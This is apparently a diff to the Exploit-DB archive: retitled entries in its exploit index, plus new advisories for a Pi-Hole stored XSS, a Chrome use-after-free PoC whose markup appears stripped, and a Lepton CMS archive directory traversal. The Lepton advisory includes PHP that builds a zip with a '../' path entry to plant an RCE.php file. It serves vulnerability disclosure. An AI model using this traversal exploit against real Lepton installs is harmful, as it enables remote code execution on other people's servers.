diff --git a/files.csv b/files.csv
index acfa9fa77..046e7b2c4 100755
--- a/files.csv
+++ b/files.csv
@@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port
 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
 1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0
-1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0
+1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0
 1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0
 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0
 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
-1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0
+1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0
 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
 1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0
 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
-1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
+1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0
 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0
 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0
@@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port
 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0
 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
-1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
-1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0
+1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
+1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0
 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
-1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
-1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0
-1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0
+1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0
+1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
+1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
 1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0
 1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0
@@ -1644,8 +1644,8 @@ id,file,description,date,author,platform,type,port
 1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0
 1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0
 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
-1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
-1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
+1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0
+1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0
 1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0
 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445
@@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port
 1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0
 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0
-1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0
+1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0
 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0
-1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
+1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0
 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0
 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0
 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
@@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0
 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0
 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0
-1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0
+1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
@@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port
 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0
 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0
 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0
-4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
+4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0
 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0
 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80
 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0
@@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0
 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
-8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
+8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0
 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0
@@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port
 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
-14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
+14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0
 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0
@@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port
 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0
 23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0
 23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
-23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
-23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
@@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port
 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0
 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
-25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
+25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
@@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port
 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0
 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
-25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
+25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0
 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
@@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port
 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0
 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
-25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
+25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
 25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0
 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0
@@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port
 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
-30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
@@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port
 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
-37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
+37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
@@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port
 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0
 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0
 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80
-40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
-40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
+40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0
+40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0
 40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0
 40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443
 40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443
 40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443
+40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0
+40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80
+40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80
+40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0
+40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
+40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
diff --git a/platforms/linux/webapps/40249.txt b/platforms/linux/webapps/40249.txt
new file mode 100755
index 000000000..3d957dd13
--- /dev/null
+++ b/platforms/linux/webapps/40249.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file
+# Author: loneferret from Kioptrix
+# Product: Pi-Hole
+# Version: Web Interface 1.3
+# Web Interface software: https://github.com/pi-hole/AdminLTE
+# Version: Pi-Hole v2.8.1
+# Discovery date: July 20th 2016
+# Vendor Site: https://pi-hole.net
+# Software Download: https://github.com/pi-hole/pi-hole
+# Tested on: Ubuntu 14.04
+# Solution: Update to next version.
+
+# Software description:
+# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried,
+# a small Web page or GIF is delivered in place of the advertisement.
+# You can also replace ads with any image you want since it is just a simple
+# Webpage taking place of the ads.
+
+# Note: Not much of a vulnerability, implies you already have access
+# to the box to begin with. Still best to use good coding practices,
+# and avoid such things.
+
+# Vulnerability PoC: Stored XSS
+# Insert this:
+#
+# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt
+#
+# Then navigate to:
+# http://pi-hole-server/admin/list.php?l=white
+# or
+# http://pi-hole-server/admin/list.php?l=black
+#
+# And a pop-up will appear.
+
+# Disclosure timeline:
+# July 20th 2016: Sent initial email to author.
+# July 21st 2016: Response, bug has been forwarded to web dev people
+# July 22nd 2016: Asked to be kept up to date on fix
+# July 27th 2016: Author replied saying he shall
+# July 28th 2016: - Today I had chocolat milk -
+# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm
+# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120
+# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well.
+# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC.
- +# August 10th 2016: Still nothing +# August 12th 2016: Submitting this is taking too much time to integrate their fix + +-- +Notice: This email does not mean I'm consenting to receiving promotional +emails/spam/etc. Remember Canada has laws. diff --git a/platforms/osx/dos/40243.html b/platforms/osx/dos/40243.html new file mode 100755 index 000000000..47b556da7 --- /dev/null +++ b/platforms/osx/dos/40243.html @@ -0,0 +1,104 @@ +#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + +#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + +## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696 \ No newline at end of file diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt new file mode 100755 index 000000000..ab6111234 --- /dev/null +++ b/platforms/php/webapps/40247.txt 
@@ -0,0 +1,98 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
+
+[+] ISR: ApparitionSec
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System (CMS).
+
+
+Vulnerability Type:
+============================
+Archive Directory Traversal
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
+will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
+the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
+then be used to execute remote commands on the affected host system.
+
+e.g.
+
+We get error message as below.
+
+under "Add Ons" tab Install Module.
+Invalid LEPTON installation file. Please check the *.zip format.[1]
+
+Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
+
+
+Exploit code(s):
+===============
+
+";exit();}
+$file_name=$argv[1];
+
+$zip = new ZipArchive();
+$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
+$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
+$zip->close();
+
+echo "Malicious archive created...\r\n";
+echo "========= hyp3rlinx ============";
